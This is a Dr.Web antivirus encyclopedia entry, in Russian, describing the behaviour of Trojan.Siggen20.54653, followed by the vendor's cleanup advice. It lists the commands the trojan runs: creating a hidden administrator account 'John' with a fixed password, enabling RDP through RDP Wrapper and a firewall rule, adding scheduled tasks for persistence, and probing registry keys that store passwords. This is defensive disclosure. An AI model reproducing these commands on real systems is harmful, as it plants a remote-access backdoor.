Для корректной работы нашего сайта необходимо включить поддержку JavaScript в вашем браузере.
Trojan.Siggen20.54653
Добавлен в вирусную базу Dr.Web:
2023-05-19
Описание добавлено:
2023-05-21
Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
<SYSTEM32>\tasks\microsoft\windows\wininet\winsers
<SYSTEM32>\tasks\microsoft\windows\wininet\winser
Устанавливает следующие настройки сервисов
[HKLM\System\CurrentControlSet\Services\TermService] 'Start' = '00000002'
[HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters] 'ServiceDll' = '%ProgramFiles%\RDP Wrapper\rdpwrap.dll'
Создает следующие сервисы
'umbus' system32\DRIVERS\umbus.sys
Вредоносные функции
Запускает на исполнение
'<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
Завершает или пытается завершить
следующие системные процессы:
Ищет ветки реестра, отвечающие за хранение паролей сторонними программами
[HKCU\Software\Microsoft\Internet Account Manager]
[HKLM\Software\Microsoft\Windows Mail]
[HKCU\Software\Microsoft\Windows Mail]
Ищет следующие окна с целью
обнаружения утилит для анализа:
ClassName: 'RegmonClass', WindowName: ''
ClassName: 'FilemonClass', WindowName: ''
ClassName: 'PROCMON_WINDOW_CLASS', WindowName: ''
Изменения в файловой системе
Создает следующие файлы
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\desktop.ini
<SYSTEM32>\microsoft\protect\s-1-5-20\6d7ec15b-dd71-4eb3-8a64-1c149473e8f8
%ProgramFiles%\rdp wrapper\rdpwrap.dll
%ALLUSERSPROFILE%\rdpwinst.exe
%TEMP%\aut8fb4.tmp
%ProgramFiles%\rdp wrapper\rdpwrap.ini
%TEMP%\aut8f46.tmp
%ALLUSERSPROFILE%\windows tasks service\settings.dat
%TEMP%\aut30e0.tmp
%APPDATA%\rms_settings\logs\rms_log_2023-05.html
%ALLUSERSPROFILE%\windows tasks service\winserv.exe
%TEMP%\autf037.tmp
%LOCALAPPDATA%\microsoft\windows\history\low\history.ie5\index.dat
%APPDATA%\microsoft\windows\cookies\low\index.dat
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\xb9nwrms\desktop.ini
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\18pl5c0z\desktop.ini
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\bxah6knh\desktop.ini
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\6fp5qhnb\desktop.ini
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\index.dat
%LOCALAPPDATA%\microsoft\windows\history\low\history.ie5\desktop.ini
%LOCALAPPDATA%\microsoft\windows\history\low\desktop.ini
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\desktop.ini
<SYSTEM32>\microsoft\protect\s-1-5-20\preferred
%ALLUSERSPROFILE%\microsoft\crypto\rsa\machinekeys\f686aace6942fb7f7ceb231212eef4a4_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
Присваивает атрибут 'скрытый' для следующих файлов
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\desktop.ini
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\desktop.ini
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\6fp5qhnb\desktop.ini
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\bxah6knh\desktop.ini
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\18pl5c0z\desktop.ini
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\xb9nwrms\desktop.ini
%LOCALAPPDATA%\microsoft\windows\history\low\history.ie5\desktop.ini
%LOCALAPPDATA%\microsoft\windows\history\low\desktop.ini
%ProgramFiles%\rdp wrapper\rdpwrap.ini
%ALLUSERSPROFILE%\windows tasks service\settings.dat
%ALLUSERSPROFILE%\windows tasks service\winserv.exe
%ALLUSERSPROFILE%\rdpwinst.exe
Удаляет следующие файлы
%TEMP%\autf037.tmp
%TEMP%\aut30e0.tmp
%TEMP%\aut8f46.tmp
%TEMP%\aut8fb4.tmp
%ALLUSERSPROFILE%\rdpwinst.exe
Сетевая активность
UDP
DNS ASK ip###ger.com
DNS ASK id###ver.xyz
DNS ASK rm#####ver.tektonit.ru
DNS ASK id####erbackup.xyz
Другое
Ищет следующие окна
ClassName: 'Registry Monitor - Sysinternals: www.sysinternals.com' WindowName: ''
ClassName: '18467-41' WindowName: ''
ClassName: 'File Monitor - Sysinternals: www.sysinternals.com' WindowName: ''
ClassName: 'Process Monitor - Sysinternals: www.sysinternals.com' WindowName: ''
Создает и запускает на исполнение
'%ALLUSERSPROFILE%\rdpwinst.exe' -i
'%ALLUSERSPROFILE%\windows tasks service\winserv.exe' Task Service\winserv.exe
'%ALLUSERSPROFILE%\windows tasks service\winserv.exe' -second
'%ALLUSERSPROFILE%\windows tasks service\winserv.exe'
'<SYSTEM32>\schtasks.exe' /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"%ALLUSERSPROFILE%\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /c net localgroup "Remote Desktop Users" john /add' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /c net localgroup "Administradores" John /add' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /c net localgroup "Administrators" John /add' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /c net localgroup "Пользователи удаленного рабочего стола" John /add' (со скрытым окном)
'%ALLUSERSPROFILE%\rdpwinst.exe' -i' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /c net localgroup "Администраторы" John /add' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /c net user John 12345 /add' (со скрытым окном)
'%ALLUSERSPROFILE%\windows tasks service\winserv.exe' ' (со скрытым окном)
'%ALLUSERSPROFILE%\windows tasks service\winserv.exe' Task Service\winserv.exe' (со скрытым окном)
'<SYSTEM32>\schtasks.exe' /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"%ALLUSERSPROFILE%\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /c net localgroup "Пользователи удаленного управления" john /add" John /add' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /c %ALLUSERSPROFILE%\Install\del.bat' (со скрытым окном)
Запускает на исполнение
'<SYSTEM32>\rundll32.exe' "<SYSTEM32>\WININET.dll",DispatchAPICall 1
'<SYSTEM32>\net1.exe' localgroup "Пользователи удаленного управления" john /add" John /add
'<SYSTEM32>\net1.exe' localgroup "Пользователи удаленного рабочего стола" John /add
'<SYSTEM32>\net1.exe' localgroup "Администраторы" John /add
'<SYSTEM32>\net1.exe' localgroup "Remote Desktop Users" john /add
'<SYSTEM32>\net.exe' localgroup "Пользователи удаленного рабочего стола" John /add
'<SYSTEM32>\net1.exe' localgroup "Administradores" John /add
'<SYSTEM32>\net.exe' localgroup "Пользователи удаленного управления" john /add" John /add
'<SYSTEM32>\net1.exe' localgroup "Administrators" John /add
'<SYSTEM32>\net.exe' localgroup "Remote Desktop Users" john /add
'<SYSTEM32>\net.exe' localgroup "Администраторы" John /add
'<SYSTEM32>\net.exe' localgroup "Administradores" John /add
'<SYSTEM32>\cmd.exe' /c %ALLUSERSPROFILE%\Install\del.bat
'<SYSTEM32>\net.exe' localgroup "Administrators" John /add
'<SYSTEM32>\net.exe' user John 12345 /add
'<SYSTEM32>\cmd.exe' /c net localgroup "Remote Desktop Users" john /add
'<SYSTEM32>\cmd.exe' /c net localgroup "Administradores" John /add
'<SYSTEM32>\cmd.exe' /c net localgroup "Administrators" John /add
'<SYSTEM32>\cmd.exe' /c net localgroup "Пользователи удаленного управления" john /add" John /add
'<SYSTEM32>\cmd.exe' /c net localgroup "Пользователи удаленного рабочего стола" John /add
'<SYSTEM32>\cmd.exe' /c net localgroup "Администраторы" John /add
'<SYSTEM32>\cmd.exe' /c net user John 12345 /add
'<SYSTEM32>\taskeng.exe' {A333F9C9-3899-4CC2-9788-7F3E2B584C8C} S-1-5-21-1960123792-2022915161-3775307078-1001:bvbxgwzvndl\user:Interactive:[1]
'<SYSTEM32>\schtasks.exe' /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"%ALLUSERSPROFILE%\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST
'<SYSTEM32>\schtasks.exe' /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"%ALLUSERSPROFILE%\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST
'<SYSTEM32>\net1.exe' user John 12345 /add
'<SYSTEM32>\timeout.exe' 5
Рекомендации по лечению
Windows
macOS
Linux
Android
В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store .
Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light . Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
выключите устройство и включите его в обычном режиме.
Подробнее о Dr.Web для Android
Демо бесплатно на 14 дней
Выдаётся при установке
Поздравляем!
Обменяйте их на скидку до 50% на покупку Dr.Web.
Получить скидку
Скачайте Dr.Web для Android
Бесплатно на 3 месяца
Все компоненты защиты
Продление демо через AppGallery/Google Pay
Если Вы продолжите использование данного сайта, это означает, что Вы даете согласие на использование нами Cookie-файлов и иных технологий по сбору статистических сведений о посетителях. Подробнее
OK